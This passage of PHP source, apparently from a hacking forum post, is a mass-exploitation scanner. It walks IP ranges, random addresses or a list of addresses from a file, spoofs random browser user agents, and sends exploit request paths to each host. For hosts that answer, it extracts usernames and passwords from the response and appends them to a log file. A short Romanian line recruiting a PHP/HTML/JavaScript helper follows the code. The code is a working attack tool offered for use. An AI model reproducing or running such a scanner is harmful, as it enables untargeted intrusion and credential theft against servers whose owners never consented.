(strstr($ip[3], '-')) ? explode('-', $ip[3]) : explode('-', "{$ip[3]}-{$ip[3]}"); return $ip; } else { return FALSE; } } //GENERATING IPS RANDOM function __getIPRandom() { $bloc1 = rand(0, 255); $bloc2 = rand(0, 255); $bloc3 = rand(0, 255); $bloc4 = rand(0, 255); $ip = "{$bloc1}.{$bloc2}.{$bloc3}.{$bloc4}"; return $ip; } //OPENING FILE FILE IPS function __getIPFile($file) { if (isset($file) && !empty($file)) { $resultIP = array_unique(array_filter(explode("\n", file_get_contents($file)))); __plus(); if (is_array($resultIP)) { return ($resultIP); } } return FALSE; } //AGENT REQUEST RANDOM function __getUserAgentRandom() { //AGENT BROSER $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox', 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror' ); //AGENT OPERATING SYSTEM $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD', 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix', 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android' ); //AGENT LOCAL FAKE $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO', 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar', 'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK' ); return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ''; } //SEND REQUEST SERVER function __request($params) { $objcurl = curl_init(); $status = array(); curl_setopt($objcurl, CURLOPT_URL, "http://{$params['host']}{$params['exploit']}"); (!is_null($params['proxy']) ? curl_setopt($objcurl, CURLOPT_PROXY, $params['proxy']) : NULL); curl_setopt($objcurl, CURLOPT_USERAGENT, __getUserAgentRandom()); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl); __plus(); $server = curl_getinfo($objcurl); __plus(); //FILTERING SERVER INFORMATION preg_match_all('(HTTP.*)', $info['corpo'], $status['http']); preg_match_all('(Server:.*)', $info['corpo'], $status['server']); preg_match_all('(X-Powered-By:.*)', $info['corpo'], $status['X-Powered-By']); $info['dados_01'] = $server; $info['dados_02'] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}")); curl_close($objcurl); __plus(); return $info; } //SUB PROCESS function __subProcess($params, $target) { foreach ($params['exploit_model'] as $camp => $value) { $params['exploit'] = $value; $params['exploit_model'] = $camp; $params['host'] = $target; $rest = __request($params); __plus(); if ($rest['dados_01']['http_code'] != 0) { break; } } __plus(); $_SESSION["cont_ip"] ++; if ($rest['dados_01']['http_code'] == 200) { //FOUND FILE $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c05"]}"; echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; $output_view = "{$style_var} [ ! ]__[iNFO][COD]: {$rest['dados_01']['http_code']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][iP/FILE]: {$params['host']}{$params['exploit']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][MODEL]: {$params['exploit_model']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_1]: {$rest['dados_02']}\n{$_SESSION["c00"]}"; $info_ip = __infoIP($rest['dados_01']['primary_ip']); $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_2]: {$info_ip}\n{$_SESSION["c00"]}"; echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"]; $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}"; file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND); __plus(); } else { //FILE NOT FOUND echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}"; } echo $_SESSION["c07"] . $params['line'] . $_SESSION["c00"]; } function main($params) { //IMPLEMENTATION HOME echo __banner("{$_SESSION["c13"]}{$params['line']}\n{$_SESSION["c00"]}", 1); if ($params['op'] == 0) { //WORKING WITH IPS ON TRACK for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) { __plus(); __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}"); __plus(); } } elseif ($params['op'] == 1) { //WORKING WITH IP RANDOM !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL; for ($i = 0; $i <= $params['limit-ip']; $i++) { __subProcess($params, __getIPRandom()); __plus(); } } elseif ($params['op'] == 2) { //IP WORK SOURCE FILE !is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL; __plus(); foreach ($params['file'] as $value) { __subProcess($params, $value); __plus(); } } } //RUNNING ALL PROCESS main($params); Mirror Source

Caut om care stie sa lucreze in php , html sau javascript . PM pentru detalii.